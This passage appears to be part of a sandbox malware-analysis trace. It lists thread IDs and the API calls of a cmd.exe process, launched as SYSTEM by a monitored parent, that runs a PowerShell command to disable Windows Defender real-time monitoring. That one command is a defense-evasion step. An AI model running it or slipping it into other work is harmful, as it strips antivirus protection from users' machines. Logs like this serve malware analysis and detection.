	os_tid = 0x4ac


Thread:
	id = 117
	os_tid = 0x4a8


Thread:
	id = 118
	os_tid = 0x490


Thread:
	id = 119
	os_tid = 0x480


Thread:
	id = 120
	os_tid = 0x470


Thread:
	id = 121
	os_tid = 0x3e0


Thread:
	id = 122
	os_tid = 0x3d8


Thread:
	id = 123
	os_tid = 0x3cc


Thread:
	id = 124
	os_tid = 0x36c


Thread:
	id = 125
	os_tid = 0x368


Thread:
	id = 126
	os_tid = 0x364


Thread:
	id = 127
	os_tid = 0x358


Thread:
	id = 128
	os_tid = 0x350


Thread:
	id = 155
	os_tid = 0x248


Thread:
	id = 246
	os_tid = 0x52c


Thread:
	id = 247
	os_tid = 0x4b4


Thread:
	id = 248
	os_tid = 0xbd0


Thread:
	id = 249
	os_tid = 0xc80


Thread:
	id = 250
	os_tid = 0xc24


Thread:
	id = 251
	os_tid = 0xc40


Thread:
	id = 261
	os_tid = 0x760


Process:
	id = "26"
	image_name = "cmd.exe"
	filename = "c:\\windows\\system32\\cmd.exe"
	page_root = "0x7ee17700"
	os_pid = "0x22c"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 134
	os_tid = 0x130

	[0084.826] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfcd4 | out: lpSystemTimeAsFileTime=0x2dfcd4*(dwLowDateTime=0x1c68a1c0, dwHighDateTime=0x1d50a6a)) 
	[0084.826] GetCurrentProcessId () returned 0x22c
	[0084.826] GetCurrentThreadId () returned 0x130
	[0084.826] GetTickCount () returned 0xa6d01d
	[0084.826] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfccc | out: lpPerformanceCount=0x2dfccc*=15866395746) returned 1
	[0084.826] GetModuleHandleA (lpModuleName=0x0) returned 0x4a580000
	[0084.826] __set_app_type (_Type=0x1) 
	[0084.826] __p__fmode () returned 0x770231f4
	[0084.826] __p__commode () returned 0x770231fc
	[0084.827] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5a21a6) returned 0x0
	[0084.827] __getmainargs (in: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c, _DoWildCard=0, _StartInfo=0x4a5a4140 | out: _Argc=0x4a5a4238, _Argv=0x4a5a4240, _Env=0x4a5a423c) returned 0
	[0084.827] GetCurrentThreadId () returned 0x130
	[0084.827] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x130) returned 0x38
	[0084.827] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0084.827] GetProcAddress (hModule=0x76b10000, lpProcName="SetThreadUILanguage") returned 0x76b624c2
	[0084.827] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0084.827] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0084.827] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2dfc64 | out: phkResult=0x2dfc64*=0x0) returned 0x2
	[0084.827] VirtualQuery (in: lpAddress=0x2dfc9b, lpBuffer=0x2dfc34, dwLength=0x1c | out: lpBuffer=0x2dfc34*(BaseAddress=0x2df000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0084.827] VirtualQuery (in: lpAddress=0x1e0000, lpBuffer=0x2dfc34, dwLength=0x1c | out: lpBuffer=0x2dfc34*(BaseAddress=0x1e0000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c
	[0084.827] VirtualQuery (in: lpAddress=0x1e1000, lpBuffer=0x2dfc34, dwLength=0x1c | out: lpBuffer=0x2dfc34*(BaseAddress=0x1e1000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c
	[0084.827] VirtualQuery (in: lpAddress=0x1e3000, lpBuffer=0x2dfc34, dwLength=0x1c | out: lpBuffer=0x2dfc34*(BaseAddress=0x1e3000, AllocationBase=0x1e0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0084.827] VirtualQuery (in: lpAddress=0x2e0000, lpBuffer=0x2dfc34, dwLength=0x1c | out: lpBuffer=0x2dfc34*(BaseAddress=0x2e0000, AllocationBase=0x2e0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c
	[0084.827] GetConsoleOutputCP () returned 0x1b5
	[0084.827] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0084.828] SetConsoleCtrlHandler (HandlerRoutine=0x4a59e72a, Add=1) returned 1
	[0084.828] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1
	[0084.828] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.828] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5a41ac | out: lpMode=0x4a5a41ac) returned 1
	[0084.828] _get_osfhandle (_FileHandle=1) returned 0x7
	[0084.828] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
	[0084.828] _get_osfhandle (_FileHandle=0) returned 0x3
	[0084.828] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5a41b0 | out: lpMode=0x4a5a41b0) returned 1
	[0084.828] _get_osfhandle (_FileHandle=0) returned 0x3
	[0084.828] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x187) returned 1
	[0084.828] GetEnvironmentStringsW () returned 0x4d0238*
	[0084.828] GetProcessHeap () returned 0x4c0000
	[0084.828] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x892) returned 0x4d0ad8
	[0084.829] FreeEnvironmentStringsW (penv=0x4d0238) returned 1
	[0084.829] GetProcessHeap () returned 0x4c0000
	[0084.829] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x4) returned 0x4cfb38
	[0084.829] GetEnvironmentStringsW () returned 0x4d0238*
	[0084.829] GetProcessHeap () returned 0x4c0000
	[0084.829] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x892) returned 0x4d1378
	[0084.829] FreeEnvironmentStringsW (penv=0x4d0238) returned 1
	[0084.829] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2debd4 | out: phkResult=0x2debd4*=0x40) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0xc8, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x1, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0x1, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x0, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x40, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x40, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0x40, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.829] RegCloseKey (hKey=0x40) returned 0x0
	[0084.829] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2debd4 | out: phkResult=0x2debd4*=0x40) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0x40, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x1, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0x1, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x0, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x9, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x4, lpData=0x2debe0*=0x9, lpcbData=0x2debd8*=0x4) returned 0x0
	[0084.829] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2debdc, lpData=0x2debe0, lpcbData=0x2debd8*=0x1000 | out: lpType=0x2debdc*=0x0, lpData=0x2debe0*=0x9, lpcbData=0x2debd8*=0x1000) returned 0x2
	[0084.830] RegCloseKey (hKey=0x40) returned 0x0
	[0084.830] time (in: timer=0x0 | out: timer=0x0) returned 0x5cdadf55
	[0084.830] srand (_Seed=0x5cdadf55) 
	[0084.830] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0084.830] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true"
	[0084.830] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.830] GetProcessHeap () returned 0x4c0000
	[0084.830] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x210) returned 0x4d1c18
	[0084.830] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4d1c20, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b
	[0084.830] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0084.830] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0084.830] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2
	[0084.830] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8
	[0084.830] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1
	[0084.831] GetProcessHeap () returned 0x4c0000
	[0084.831] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d0ad8 | out: hHeap=0x4c0000) returned 1
	[0084.831] GetEnvironmentStringsW () returned 0x4d26e8*
	[0084.831] GetProcessHeap () returned 0x4c0000
	[0084.831] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8aa) returned 0x4d0238
	[0084.831] FreeEnvironmentStringsW (penv=0x4d26e8) returned 1
	[0084.831] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b
	[0084.831] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a5b0640, nSize=0x2000 | out: lpBuffer="") returned 0x0
	[0084.831] _wcsicmp (_String1="KEYS", _String2="CD") returned 8
	[0084.831] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6
	[0084.831] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8
	[0084.831] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8
	[0084.831] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7
	[0084.831] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9
	[0084.831] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7
	[0084.831] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3
	[0084.831] GetProcessHeap () returned 0x4c0000
	[0084.831] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x30) returned 0x4d00b8
	[0084.831] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2df9a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x2df9a0, lpFilePart=0x2df99c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x2df99c*="system32") returned 0x13
	[0084.831] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0084.831] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x2df71c | out: lpFindFileData=0x2df71c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x8797820, ftLastAccessTime.dwHighDateTime=0x1d4d67f, ftLastWriteTime.dwLowDateTime=0x8797820, ftLastWriteTime.dwHighDateTime=0x1d4d67f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x4d0af0
	[0084.832] FindClose (in: hFindFile=0x4d0af0 | out: hFindFile=0x4d0af0) returned 1
	[0084.832] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x2df71c | out: lpFindFileData=0x2df71c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x3a13b080, ftLastAccessTime.dwHighDateTime=0x1d4d68e, ftLastWriteTime.dwLowDateTime=0x3a13b080, ftLastWriteTime.dwHighDateTime=0x1d4d68e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x4d0af0
	[0084.832] FindClose (in: hFindFile=0x4d0af0 | out: hFindFile=0x4d0af0) returned 1
	[0084.832] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10
	[0084.832] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1
	[0084.832] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1
	[0084.832] GetProcessHeap () returned 0x4c0000
	[0084.832] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d0238 | out: hHeap=0x4c0000) returned 1
	[0084.832] GetEnvironmentStringsW () returned 0x4d0238*
	[0084.832] GetProcessHeap () returned 0x4c0000
	[0084.832] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x8da) returned 0x4d2fd0
	[0084.832] FreeEnvironmentStringsW (penv=0x4d0238) returned 1
	[0084.832] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a5a5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0084.832] GetProcessHeap () returned 0x4c0000
	[0084.832] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d00b8 | out: hHeap=0x4c0000) returned 1
	[0084.832] GetProcessHeap () returned 0x4c0000
	[0084.832] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400e) returned 0x4d38b8
	[0084.833] GetProcessHeap () returned 0x4c0000
	[0084.833] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x86) returned 0x4c07f0
	[0084.833] GetProcessHeap () returned 0x4c0000
	[0084.833] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d38b8 | out: hHeap=0x4c0000) returned 1
	[0084.833] GetConsoleOutputCP () returned 0x1b5
	[0084.856] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a5a4260 | out: lpCPInfo=0x4a5a4260) returned 1
	[0084.856] GetUserDefaultLCID () returned 0x409
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a5a4950, cchData=8 | out: lpLCData=":") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2dfae0, cchData=128 | out: lpLCData="0") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2dfae0, cchData=128 | out: lpLCData="0") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2dfae0, cchData=128 | out: lpLCData="1") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a5a4940, cchData=8 | out: lpLCData="/") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a5a4d80, cchData=32 | out: lpLCData="Mon") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a5a4d40, cchData=32 | out: lpLCData="Tue") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a5a4d00, cchData=32 | out: lpLCData="Wed") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a5a4cc0, cchData=32 | out: lpLCData="Thu") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a5a4c80, cchData=32 | out: lpLCData="Fri") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a5a4c40, cchData=32 | out: lpLCData="Sat") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a5a4c00, cchData=32 | out: lpLCData="Sun") returned 4
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a5a4930, cchData=8 | out: lpLCData=".") returned 2
	[0084.857] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a5a4920, cchData=8 | out: lpLCData=",") returned 2
	[0084.858] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0084.863] GetProcessHeap () returned 0x4c0000
	[0084.863] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x20c) returned 0x4c0880
	[0084.863] GetConsoleTitleW (in: lpConsoleTitle=0x4c0880, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0084.863] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76b10000
	[0084.863] GetProcAddress (hModule=0x76b10000, lpProcName="CopyFileExW") returned 0x76b4ac6c
	[0084.863] GetProcAddress (hModule=0x76b10000, lpProcName="IsDebuggerPresent") returned 0x76b53ea8
	[0084.863] GetProcAddress (hModule=0x76b10000, lpProcName="SetConsoleInputExeNameW") returned 0x76b62732
	[0084.863] GetProcessHeap () returned 0x4c0000
	[0084.863] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x400a) returned 0x4d38b8
	[0084.863] GetProcessHeap () returned 0x4c0000
	[0084.864] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x4d38b8 | out: hHeap=0x4c0000) returned 1
	[0084.864] _wcsicmp (_String1="powershell", _String2=")") returned 71
	[0084.864] _wcsicmp (_String1="FOR", _String2="powershell") returned -10
	[0084.864] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10
	[0084.864] _wcsicmp (_String1="IF", _String2="powershell") returned -7
	[0084.864] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7
	[0084.864] _wcsicmp (_String1="REM", _String2="powershell") returned 2
	[0084.864] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2
	[0084.864] GetProcessHeap () returned 0x4c0000
	[0084.864] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x58) returned 0x4c0a98
	[0084.864] GetProcessHeap () returned 0x4c0000
	[0084.864] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x1e) returned 0x4ce8e8
	[0084.865] GetProcessHeap () returned 0x4c0000
	[0084.865] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x6e) returned 0x4c0af8
	[0084.866] GetConsoleTitleW (in: lpConsoleTitle=0x2df7d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0084.866] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0084.866] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0084.866] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0084.866] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0084.866] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0084.866] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0084.866] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0084.866] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0084.866] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0084.866] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0084.866] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0084.866] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0084.866] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0084.866] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0084.866] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0084.866] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0084.866] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
	[0084.866] _wcsicmp (_String1="powershell", _String2="RD") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="PATH") returned 14
	[0084.867] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9
	[0084.867] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3
	[0084.867] _wcsicmp (_String1="powershell", _String2="CLS") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="CALL") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6
	[0084.867] _wcsicmp (_String1="powershell", _String2="VER") returned -6
	[0084.867] _wcsicmp (_String1="powershell", _String2="VOL") returned -6
	[0084.867] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11
	[0084.867] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3
	[0084.867] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11
	[0084.867] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4
	[0084.867] _wcsicmp (_String1="powershell", _String2="START") returned -3
	[0084.867] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12
	[0084.867] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5
	[0084.867] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3
	[0084.867] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6
	[0084.867] _wcsicmp (_String1="powershell", _String2="POPD") returned 7
	[0084.867] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15
	[0084.867] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10
	[0084.867] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14
	[0084.867] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3
	[0084.867] _wcsicmp (_String1="powershell", _String2="DIR") returned 12
	[0084.867] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11
	[0084.867] _wcsicmp (_String1="powershell", _String2="DEL") returned 12
	[0084.867] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4
	[0084.867] _wcsicmp (_String1="powershell", _String2="COPY") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="CD") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13
	[0084.867] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="REN") returned -2
	[0084.867] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11
	[0084.867] _wcsicmp (_String1="powershell", _String2="SET") returned -3
	[0084.867] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14
	[0084.867] _wcsicmp (_String1="powershell", _String2="DATE") returned 12
	[0084.867] _wcsicmp (_String1="powershell", _String2="TIME") returned -4
	[0084.867] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3
	[0084.867] _wcsicmp (_String1="powershell", _String2="MD") returned 3
	[0084.867] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3
